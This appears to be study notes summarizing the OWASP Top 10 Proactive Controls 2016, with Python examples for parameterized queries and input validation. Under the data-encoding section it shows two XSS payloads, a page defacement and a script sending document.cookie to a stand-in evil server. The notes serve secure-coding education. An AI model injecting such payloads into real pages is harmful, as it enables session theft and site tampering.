OWASP Top 10 Controls 2016 Summary

OWASP Top 10 Proactive Controls 2016

Ordered by importance, with control number 1 being the most important.

  1. Verify for security early and often.
  2. Parameterize queries.
  3. Encode data.
  4. Validate all inputs.
  5. Implement identity and authentication controls.
  6. Implement appropriate access controls.
  7. Protect data.
  8. Implement logging and intrusion detection.
  9. Leverage security frameworks and libraries.
  10. Error and exception handling.

1. Verify for Security Early and Often

2. Parameterize Queries

Python Example

email = REQUEST['email']    # untrusted values taken from the request
user_id = REQUEST['id']
# Named placeholders are bound by the database driver; the user input is never concatenated into the SQL string
cur.execute('update users set email=:new_email where id=:user_id', {'new_email': email, 'user_id': user_id})

3. Encode Data

XSS site defacement:

<script>document.body.innerHTML = "Sebas was here";</script>

XSS session theft:

<script>
    var img = new Image();
    img.src = "http://someevilserver.com?" + document.cookie;
</script>

Types of XSS:

  • Persistent (or Stored XSS)
  • Reflected
  • DOM based

4. Validate All Inputs

The most secure applications treat all variables as untrusted and provide security controls regardless of the source of data.

General approaches to performing input syntax validation:

  • Blacklisting
  • Whitelisting

When building secure software, whitelisting is the generally preferred approach.

Regular Expressions

Care should be exercised when creating regular expressions. Poorly designed expressions (for example nested or unbounded quantifiers) may result in denial of service conditions (aka ReDoS).
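As an added example that is not part of the gist, the following Python code combines controls 3 and 4: whitelist validation of untrusted fields with anchored, bounded regular expressions, and HTML output encoding so that the defacement payload shown above is rendered as inert text. The patterns and function names are assumptions made for this illustration.

```python
import html
import re

# Whitelist patterns (constructed for this example): anchored, single
# quantifiers with bounded repetition, so matching cannot backtrack catastrophically.
USER_ID_RE = re.compile(r"[0-9]{1,18}")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,24}")


def validate_user_id(value: str) -> int:
    """Accept only a short run of digits; everything else is rejected."""
    if not USER_ID_RE.fullmatch(value):
        raise ValueError("user id must be 1-18 digits")
    return int(value)


def validate_email(value: str) -> str:
    """Whitelist check on the overall shape of an email address."""
    if len(value) > 254 or not EMAIL_RE.fullmatch(value):
        raise ValueError("email has an unexpected format")
    return value


def render_greeting(display_name: str) -> str:
    """Encode untrusted data for an HTML body context before inserting it."""
    # html.escape turns & < > " ' into entities, so a <script> tag is shown, not executed
    return "<p>Hello, " + html.escape(display_name, quote=True) + "</p>"


if __name__ == "__main__":
    # Constructed sample inputs, including the defacement payload from section 3.
    print(validate_user_id("42"))
    print(validate_email("alice@example.com"))
    print(render_greeting('<script>document.body.innerHTML = "Sebas was here";</script>'))
    for bad in ("42; drop table users", "<b>bold</b>"):
        try:
            validate_user_id(bad)
        except ValueError as err:
            print("rejected:", repr(bad), "->", err)
```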

5. Implement Identity and Authentication Controls

  • Use Multi-Factor Authentication
    • Something the user knows - password or PIN
    • Something the user owns - token or phone
    • Something the user is - biometrics
  • Mobile Application: Token-Based Authentication
  • Implement Secure Password Storage
  • Implement Secure Password Recovery Mechanism
  • Session: Generation and Expiration
  • Require Reauthentication for Sensitive Features

6. Implement Access Controls

Authentication --> Verify an identity.
Authorization --> Access to a particular feature/resource should be granted or denied.

  • Force All Requests to go Through Access Control Check
  • Deny by Default
  • Principle of Least Privilege
  • Avoid Hard-Coded Access Control Checks
  • Code to the Activity
  • Server-Side Trusted Data Should Drive Access Control

7. Protect Data

  • Encrypting Data in Transit
  • Encrypting Data at Rest
  • Implement Protection in Transit
  • Mobile Application: Secure Local Storage

8. Implement Logging and Intrusion Detection

9. Leverage Security Frameworks and Libraries

10. Error and Exception Handling
